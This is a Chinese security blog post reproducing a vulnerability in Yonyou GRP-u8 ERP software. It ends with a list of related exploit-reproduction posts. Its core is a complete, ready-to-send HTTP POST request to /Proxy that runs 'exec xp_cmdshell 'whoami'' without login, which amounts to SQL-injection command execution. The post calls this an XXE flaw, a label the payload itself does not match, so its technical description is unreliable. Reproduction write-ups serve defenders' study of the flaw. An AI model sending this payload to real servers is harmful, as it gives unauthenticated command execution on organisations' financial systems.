用友GRP-u8 XXE 漏洞复现
0x00 漏洞描述
用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件。
0x01 漏洞利用条件
无需登录
0x02 漏洞复现
POC:
POST /Proxy HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Host: localhost
Content-Length: 341
Connection: Keep-Alive
Cache-Control: no-cachecVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'whoami'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
burp抓包,修改url为/Proxy,在body中添加payload
0x03 修复建议
升级最新版本
转载请注明:Adminxe's Blog » 用友GRP-u8 XXE 漏洞复现
用友GRP-u8 XXE 漏洞复现相关推荐
- 用友php漏洞,用友GRP-u8 注入-RCE漏洞复现
用友GRP-u8 注入-RCE漏洞复现 (HW第一时间复现了,当时觉得不合适,现在才发出来) 一.漏洞简介 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导 ...
- x友GRP-u8 注入-RCE漏洞复现
用友GRP-u8 注入-RCE漏洞复现 一.漏洞简介 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件. 二.漏洞复现 SQL注入POC ...
- 用友NC目录遍历漏洞复现
简介: 用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息. 漏洞复现: fofa直接搜索: app="用友-UFIDA-NC" 漏洞拼接目录: /NCFi ...
- Xxe漏洞 php,PhpSpreadsheet 1.5.0 XXE漏洞复现及分析
0x01 前言 PhpSpreadsheet是一个非常流行的纯 PHP 类库,能够让你方便的读写Excel.LibreOffic Calc等表格格式的文件,是PHPExcel的替代者.2018年11月 ...
- CNVD-2021-30167 用友NC命令执行漏洞复现
一.漏洞概述 2021年06月03日,用友官方发布了用友BeanShell远程代码执行漏洞的风险通告,漏洞编号为CNVD-2021-30167,漏洞等级:严重,漏洞评分:9.8. 用友NC是面向集团企 ...
- 用友NC uapjs RCE漏洞复现(CNVD-C-2023-76801)
0x01 产品简介 用友NC是一款企业级ERP软件.作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计.采购管理.销售管理.物料管理.生产计划和人力资源管理等,帮助企业实现数字化转 ...
- 泛微E-Cology XXE漏洞复现(QVD-2023-16177)
0x01 产品简介 泛微协同管理应用平台E-Cology是一套兼具企业信息门户.知识文档管理.工作流程管理.人力资源管理.客户关系管理.项目管理.财务管理.资产管理.供应链管理.数据中心功能的企业大型 ...
- xxe漏洞浅谈以及复现
一.xxe利用部分 <?xml version="1.0" encoding="utf-8"?> ----> xml声明 <!DOCTY ...
- 用友NC BeanShell远程代码执行漏洞复现
用友NC远程代码执行漏洞复现 漏洞介绍 用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一.该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接 ...
最新文章
- 浅谈CSRF攻击方式
- linux 服务管理两种方式service和systemctl
- Mybatis字段模糊查询
- 谷歌开发者工具详解 Network篇
- jQuery——parent(),parents(),offsetParent(),closets()方法
- 二叉树(多路平衡搜索树)-(代码、分析、汇编)
- python读取栅格gdal库下载链接
- Socket粘包问题终极解决方案—Netty版(2W字)!
- Python爬虫从入门到放弃(二十)之 Scrapy分布式原理
- 上手测试GaussDB(for Redis) 和开源 Redis,只为推荐质优价廉的Redis
- 编写高质量代码改善C#程序的157个建议——建议50:在Dispose模式中应区别对待托管资源和非托管资源...
- Windows XP Home Edition安裝 IIS 的方法
- 至强3系列服务器cpu吗,做3D MAX是要求CPU好一点 还是显卡好一点? CPU的话是界面CPU(i 系列)好还是服务器CPU(至强系列)好?...
- python全套学习资料_20小时学会python的心路历程,附全套学习资料和视频教程
- java guardedby_JAVA多线程(五)模式-Guarded Suspension
- 联接无止境!500万台AP潜在大数据流量入口
- 3D打印云平台在线显示
- python day02
- 【单片机原理及其应用】第五章定时器的介绍和习题分析
- php免费利用飞信发送验证码,php通过飞信发送短信